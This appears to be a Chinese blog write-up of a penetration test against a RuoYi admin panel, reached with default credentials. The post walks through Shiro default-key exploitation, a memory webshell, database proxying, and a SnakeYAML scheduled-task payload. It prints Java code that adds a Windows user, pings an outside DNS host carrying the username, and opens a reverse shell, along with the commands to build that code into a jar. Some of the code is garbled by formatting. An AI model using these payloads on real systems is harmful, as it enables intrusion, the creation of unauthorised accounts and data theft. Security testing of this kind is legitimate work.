记一次若依后台管理系统渗透_执行_文章_工具

最近客户开始hw前的风险排查，让我们帮他做个渗透测试，只给一个单位名称。通过前期的信息收集，发现了做个站点：

没有验证码，再加上做个图标，吸引了我注意：

若依默认口令为admin/admin123，结果真的直接进了。

管理员权限，直接上工具探测一下是否有若依的几个漏洞：

展开全文

工具链接：

还得是运气啊！原本想着直接用这个工具一键穿的，但是奈何没利用过若依的洞，这个工具也不会使用。后续去查看了几篇文章，需要上传jar包，该漏洞可通过定时任务去调用执行jar包。

然后坑来了。按照教程去实践，发现怎么样也无法执行漏洞。以下是java代码：

publicAwesomeEngineFactory{\

try{\

Runtime.getRuntime.exec(\ "net user test test@123 /add\");\

Runtime.getRuntime.exec(\"ping tttt.ogjxcqvtbf.dnstunnel.run\");\

Runtime.getRuntime.exec(\"ping

%USERNAME%.ogjxcqvtbf.dnstunnel.run\");\

}catch (IOException e) {\

e.printStackTrace;\

尝试了一下午后，想想算了，看看有没有别的洞吧。刚好文章里面有写到，ruoyi的shiro存在默认密钥，结果一尝试，还真的存在。（Ps：这边有个坑，我用文章里面提到的LiqunKit去尝试，无法执行命令。后续用了shiro_attack成功命令执行）

然后通过shiro写入内存马：

对内存马感兴趣的，可以看下这两篇文章：

但是可惜，这是一台云主机，整个内网就一台主机。很多人可能看到esc，就不想再打了。不过我还是去翻了一下文件夹，把数据库账号也拉下来。

这个项目很奇怪，我找到的项目路径下全是jar包，我都怀疑这个是不是web目录。在基础信息里面找到了路径：

但是进入该路径下，发现没文件，不知道是不是权限不够。

可以看到这边只限制127.0.0.1的ip访问，这就很尴尬，所以这边我使用ligolo代理3306出来，成功进行连接：

工具链接：

其实也尝试过添加用户，但是貌似被拦截了。原本想用哥斯拉的内存马进行一键提权的，但是不知道为什么，哥斯拉的内存马一直连接不上。有大佬懂的，还望不吝赐教。

但是对于定时任务没复现出来，我还是很执着，通过查看其它大佬写的文章，发现了原来这个jar包的代码有问题，windows和linux的命令执行不一样，windows没办法直接通过exec执行，需要调用cmd进程进行执行。后续参考了这篇文章：

配置完后，后台添加定时任务

org.yaml.snakeyaml.Yaml.load('!!javax..EngineManager [!!java.net.URLClassLoader [[!!java.net.URL

["\"\]\]\]\]\')

Java部分源码：

+-----------------------------------------------------------------------+ | String host="ip"; | | | | int port = 6767; | | | | String cmd="cmd.exe"; | | | | Process p=new | | ProcessBuilder(cmd).redirectErrorStream(true).start; | | | | java.net.Socket s=new java.net.Socket(host,port); | | | | java.io.InputStream | | pi=p.getInputStream,pe=p.getErrorStream,si=s.getInputStream; | | | | java.io.OutputStream | | po=p.getOutputStream,so=s.getOutputStream; | +=======================================================================+ +-----------------------------------------------------------------------+

然后通过以下命令编译并打包为jar包：

+-----------------------------------------------------------------------+ | javac src/artsploit/AwesomeEngineFactory.java //编译java文件 | | | | jar -cvf yaml-payload.jar -C src/ . //打包jar包 | +=======================================================================+ +-----------------------------------------------------------------------+

成功反弹shell到我vps上：

其实如果整片文章看下来，可能会觉得比较顺利，但是其实踩了很多坑，以下是我自己的总结，也和大家分享一下：

原创稿件征集

征集原创技术文章中，欢迎投递

投稿邮箱：edu@antvsion.com

文章类型：黑客极客技术、信息安全热点安全研究分析等安全相关

通过审核并发布能收获200-800元不等的稿酬。

更多详情，点我查看！

靶场实操，戳“阅读原文“